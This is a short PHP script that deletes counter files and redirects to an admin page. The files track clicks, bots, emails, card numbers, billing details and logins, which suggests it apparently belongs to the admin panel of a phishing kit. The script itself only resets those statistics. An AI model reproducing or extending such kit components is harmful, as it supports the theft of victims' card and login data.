<?php
error_reporting(0);
session_start();
include'session.php';
unlink("result/total_click.txt");
unlink("result/faillogin_count.txt");
unlink("result/total_bot.txt");
unlink("result/total_email.txt");
unlink("result/total_cc.txt");
unlink("result/total_billing.txt");
unlink("result/total_login.txt");
unlink("result/total_ip.txt");
unlink("result/total_visitor.txt");
echo "<script type='text/javascript'>
window.top.location='../admin';
</script>";